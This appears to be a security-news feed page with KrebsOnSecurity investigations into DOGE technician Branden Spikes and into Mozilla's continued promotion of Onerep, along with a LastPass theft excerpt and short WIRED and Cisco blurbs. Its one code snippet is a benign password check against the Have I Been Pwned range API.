“While some did, the continued thefts underscore how much more needs to be done,” Bax told KrebsOnSecurity. “It’s validating to see the Secret Service and FBI corroborate our findings, but I’d much rather see fewer of these hacks in the first place. ZachXBT and SEAL 911 reported yet another wave of thefts as recently as December, showing the threat is still very real.”

Monahan said LastPass still hasn’t alerted their customers that their secrets—especially those stored in “Secure Notes”—may be at risk.

“It’s been two and a half years since LastPass was first breached [and] hundreds of millions of dollars has been stolen from individuals and companies around the globe,” Monahan said. “They could have encouraged users to rotate their credentials. They could’ve prevented millions and millions of dollars from being stolen by these threat actors. But instead they chose to deny that their customers were at risk and blame the victims instead.”

☐ ☆ ✇ Krebs on Security

Who is the DOGE and X Technician Branden Spikes?

By: BrianKrebs — March 7th 2025 at 00:54

At 49, Branden Spikes isn’t just one of the oldest technologists who has been involved in Elon Musk’s Department of Government Efficiency (DOGE). As the current director of information technology at X/Twitter and an early hire at PayPal, Zip2, Tesla and SpaceX, Spikes is also among Musk’s most loyal employees. Here’s a closer look at this trusted Musk lieutenant, whose Russian ex-wife was once married to Elon’s cousin.

The profile of Branden Spikes on X.

When President Trump took office again in January, he put the world’s richest man — Elon Musk — in charge of the U.S. Digital Service, and renamed the organization as DOGE. The group is reportedly staffed by at least 50 technologists, many of whom have ties to Musk’s companies.

DOGE has been enabling the president’s ongoing mass layoffs and firings of federal workers, largely by seizing control over computer systems and government data for a multitude of federal agencies, including the Social Security Administration, the Department of Homeland Security, the Office of Personnel Management, and the Treasury Department.

It is difficult to find another person connected to DOGE who has stronger ties to Musk than Branden Spikes. A native of California, Spikes initially teamed up with Musk in 1997 as a lead systems engineer for the software company Zip2, the first major venture for Musk. In 1999, Spikes was hired as director of IT at PayPal, and in 2002 he became just the fourth person hired at SpaceX.

In 2012, Spikes launched Spikes Security, a company whose software sought to create a compartmentalized or “sandboxed” web browser that could insulate the user from malware attacks. A review of spikes.com in the Wayback Machine shows that as far back as 1998, Musk could be seen joining Spikes for team matches in the online games Quake and Quake II. In 2016, Spikes Security merged with another security firm called Aurionpro, and the combined company was renamed Cyberinc.

A snapshot of spikes.com from 1998 shows Elon Musk’s profile in Spikes’s clan for the games Quake and Quake II.

Spikes’s LinkedIn profile says he was appointed head of IT at X in February 2025. And although his name shows up on none of the lists of DOGE employees circulated by various media outlets, multiple sources told KrebsOnSecurity that Spikes was working with DOGE and operates within Musk’s inner circle of trust.

In a conversation with KrebsOnSecurity, Spikes said he is dedicated to his country and to saving it from what he sees as certain ruin.

“Myself, I was raised by a southern conservative family in California and I strongly believe in America and her future,” Spikes said. “This is why I volunteered for two months in DC recently to help DOGE save us from certain bankruptcy.”

Spikes told KrebsOnSecurity that he recently decided to head back home and focus on his job as director of IT at X.

“I loved it, but ultimately I did not want to leave my hometown and family back in California,” Spikes said of his tenure at DOGE. “After a couple of months it became clear that to continue helping I would need to move to DC and commit a lot more time, so I politely bowed out.”

Prior to founding Spikes Security, Branden Spikes was married to a native Russian woman named Natalia whom he’d met at a destination wedding in South America in 2003.

Branden and Natalia’s names are both on the registration records for the domain name orangetearoom[.]com. This domain, which DomainTools.com says was originally registered by Branden in 2009, is the home of a tax-exempt charity in Los Angeles called the California Russian Association.

Here is a photo from a 2011 event organized by the California Russian Association, showing Branden and Natalia at one of its “White Nights” charity fundraisers:

Branden and Natalia Spikes, on left, in 2011. The man on the far right is Ivan Y. Podvalov, a board member of the Kremlin-aligned Congress of Russian Americans (CRA). The man in the center is Feodor Yakimoff, director of operations at the Transib Global Sourcing Group, and chairman of the Russian Imperial Charity Balls, which works in concert with the Russian Heritage Foundation.

In 2011, the Spikes couple got divorced, and Natalia changed her last name to Haldeman. That is not her maiden name, which appears to be “Libina.” Rather, Natalia acquired the surname Haldeman in 1998, when she married Elon Musk’s cousin.

Reeve Haldeman is the son of Scott Haldeman, who is the brother of Elon Musk’s mother, Maye Musk. Divorce records show Reeve and Natalia officially terminated their marriage in 2007. Reeve Haldeman did not respond to a request for comment.

A review of other domain names connected to Natalia Haldeman’s email address shows she has registered more than a dozen domains over the years that are tied to the California Russian Association, and an apparently related entity called the Russian Heritage Foundation, Inc.:

russianamericans.org
russianamericanstoday.com
russianamericanstoday.org
russiancalifornia.org
russianheritagefoundation.com
russianheritagefoundation.org
russianwhitenights.com
russianwhitenights.org
theforafoundation.org
thegoldentearoom.com
therussianheritagefoundation.org
tsarinahome.com

Ms. Haldeman did not respond to requests for comment. Her name and contact information appear in the registration records for these domains dating back to 2010, and a document published by ProPublica shows that by 2016 Natalia Haldeman had been appointed CEO of the California Russian Foundation.

The domain name that bears both Branden’s and Natalia’s names — orangetearoom.com — features photos of Ms. Haldeman at fundraising events for the Russian foundation through 2014. Additional photos of her and many of the same people can be seen through 2023 at another domain she registered in 2010 — russianheritagefoundation.com.

A photo from Natalia Haldeman’s Facebook page shows her mother (left) pictured with Maye Musk, Elon Musk’s mother, in 2022.

The photo of Branden and Natalia above is from one such event in 2011 (tied to russianwhitenights.org, another Haldeman domain). The person on the right in that image — Ivan Y. Podvalov — appears in many fundraising event photos published by the foundation over the past decade. Podvalov is a board member of the Congress of Russian Americans (CRA), a nonprofit group that is known for vehemently opposing U.S. financial and legal sanctions against Russia.

Writing for The Insider in 2022, journalist Diana Fishman described how the CRA has engaged in outright political lobbying, noting that in June 2014 the organization sent a letter to President Obama and the secretary general of the United Nations calling for an end to the “large-scale US intervention in Ukraine and the campaign to isolate Russia.”

“The US military contingents must be withdrawn immediately from the Eastern European region, and NATO’s enlargement efforts and provocative actions against Russia must cease,” the message read.

The Insider said the CRA director sent another two letters, this time to President Donald Trump, in 2017 and 2018.

“One was a request not to sign a law expanding sanctions against Russia,” Fishman wrote. “The other regretted the expulsion of 60 Russian diplomats from the United States and urged not to jump to conclusions on Moscow’s involvement in the poisoning of Sergei Skripal.”

The nonprofit tracking website CauseIQ.com reports that The Russian Heritage Foundation, Inc. is now known as Constellation of Humanity.

The Russian Heritage Foundation and the California Russian Association both promote the interests of the Russian Orthodox Church. This page indexed by Archive.org from russiancalifornia.org shows The California Russian Foundation organized a community effort to establish an Orthodox church in Orange County, Calif.

A press release from the Russian Orthodox Church Outside of Russia (ROCOR) shows that in 2021 the Russian Heritage Foundation donated money to organize a conference for the Russian Orthodox Church in Serbia.

A review of the “Partners” listed on the Spikes’ jointly registered domain — orangetearoom.com — shows the organization worked with a marketing company called Russian American Media. Reporting by KrebsOnSecurity last year showed that Russian American Media also partners with the problematic people-search service Radaris, which was formed by two native Russian brothers in Massachusetts who have built a fleet of consumer data brokers and Russian affiliate programs.

When asked about his ex-wife’s history, Spikes said she has a good heart and bears no ill-will toward anyone.

“I attended several of Natalia’s social events over the years we were together and can assure you that she’s got the best intentions with those,” Spikes told KrebsOnSecurity. “There’s no funny business going on. It is just a way for those friendly immigrants to find resources amongst each other to help get settled in and chase the American dream. I mean, they’re not unlike the immigrants from other countries who come to America and try to find each other and help each other find others who speak the language and share in the building of their businesses here in America.”

Spikes said his own family roots go back deeply into American history, sharing that his 6th great-grandfather was Alexander Hamilton on his mom’s side, and Jesse James on his dad’s side.

“My family roots are about as American as you can get,” he said. “I’ve also been entrusted with building and safeguarding Elon’s companies since 1999 and have a keen eye (as you do) for bad actors, so have enough perspective to tell you that Natalia has no bad blood and that she loves America.”

Of course, this perspective comes from someone who has the utmost regard for the interests of the “special government employee” Mr. Musk, who has been bragging about tossing entire federal agencies into the “wood chipper,” and who recently wielded an actual chainsaw on stage while referring to it as the “chainsaw for bureaucracy.”

“Elon’s intentions are good and you can trust him,” Spikes assured.

A special note of thanks for research assistance goes to Jacqueline Sweet, an independent investigative journalist whose work has been published in The Guardian, Rolling Stone, POLITICO and The Intercept.

☐ ☆ ✇ WIRED

1 Million Third-Party Android Devices Have a Secret Backdoor for Scammers

By: Lily Hay Newman, Matt Burgess — March 5th 2025 at 11:00
New research shows at least a million inexpensive Android devices—from TV streaming boxes to car infotainment systems—are compromised to allow bad actors to commit ad fraud and other cybercrime.
☐ ☆ ✇ Security – Cisco Blog

Cisco Live Melbourne SOC Report

By: Shaun Coulter — February 27th 2025 at 13:00
Learn how the SOC team supported Cisco Live Melbourne and some of the more interesting findings from four days of threat hunting on the network.
☐ ☆ ✇ WIRED

Inside the Telegram Groups Doxing Women for Their Facebook Posts

By: Anna Wolfe, Sarah Cammarata — February 24th 2025 at 18:26
A WIRED investigation goes inside the Telegram groups targeting women who joined “Are We Dating the Same Guy?” groups on Facebook with doxing, harassment, and sharing of nonconsensual intimate images.
☐ ☆ ✇ Krebs on Security

Nearly a Year Later, Mozilla is Still Promoting OneRep

By: BrianKrebs — February 13th 2025 at 20:14

In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership with the company. But nearly a year later, Mozilla is still promoting it to Firefox users.

Mozilla offers Onerep to Firefox users on a subscription basis as part of Mozilla Monitor Plus. Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned? to let users know when their email addresses or passwords are leaked in data breaches.
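Mozilla has not published the details of its integration, but the password side of Have I Been Pwned? is queryable through its public “range” API, which uses k-anonymity: only the first five characters of the password’s SHA-1 hash are ever sent to the service. A minimal Python sketch (standard library only; breached-email lookups, by contrast, go through a separate authenticated HIBP API):

import hashlib
import urllib.request

def pwned_count(password: str) -> int:
    # Only the first five hex characters of the SHA-1 hash leave this machine.
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)  # times this password appears in known breaches
    return 0

print(pwned_count("123456"))  # a famously breached password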

The ink on that partnership agreement had barely dried before KrebsOnSecurity published a story showing that Onerep’s Belarusian CEO and founder Dimitri Shelest had launched dozens of people-search services since 2010, including a still-active data broker called Nuwber that sells background reports on people. This seemed to contradict Onerep’s stated motto, “We believe that no one should compromise personal online security and get a profit from it.”

Shelest released a lengthy statement (PDF) wherein he acknowledged maintaining an ownership stake in Nuwber, a consumer data broker he founded in 2015 — around the same time he started Onerep.

Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.

Shelest maintained that Nuwber has “zero cross-over or information-sharing with Onerep,” and said any other old domains that may be found and associated with his name are no longer being operated by him.

“I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.”

When asked to comment on the findings, Mozilla said then that although customer data was never at risk, the outside financial interests and activities of Onerep’s CEO did not align with their values.

“We’re working now to solidify a transition plan that will provide customers with a seamless experience and will continue to put their interests first,” Mozilla said.

In October 2024, Mozilla published a statement saying the search for a different provider was taking longer than anticipated.

“While we continue to evaluate vendors, finding a technically excellent and values-aligned partner takes time,” Mozilla wrote. “While we continue this search, Onerep will remain the backend provider, ensuring that we can maintain uninterrupted services while we continue evaluating new potential partners that align more closely with Mozilla’s values and user expectations. We are conducting thorough diligence to find the right vendor.”

Asked for an update, Mozilla said the search for a replacement partner continues.

“The work’s ongoing but we haven’t found the right alternative yet,” Mozilla said in an emailed statement. “Our customers’ data remains safe, and since the product provides a lot of value to our subscribers, we’ll continue to offer it during this process.”

It’s a win-win for Mozilla that they’ve received accolades for their principled response while continuing to partner with Onerep almost a year later. But if it takes so long to find a suitable replacement, what does that say about the personal data removal industry itself?

Onerep appears to be working in partnership with another problematic people-search service: Radaris, which has a history of ignoring opt-out requests or failing to honor them. A week before breaking the story about Onerep, KrebsOnSecurity published research showing the co-founders of Radaris were two native Russian brothers who’d built a vast network of affiliate marketing programs and consumer data broker services.

Lawyers for the Radaris co-founders threatened to sue KrebsOnSecurity unless that story was retracted in full, claiming the founders were in fact Ukrainian and that our reporting had defamed the brothers by associating them with the actions of Radaris. Instead, we published a follow-up investigation which showed that not only did the brothers from Russia create Radaris, for many years they issued press releases quoting a fictitious CEO seeking money from investors.

Several readers have shared emails they received from Radaris after attempting to remove their personal data, and those messages show Radaris has been promoting Onerep.

An email from Radaris promoting Onerep.
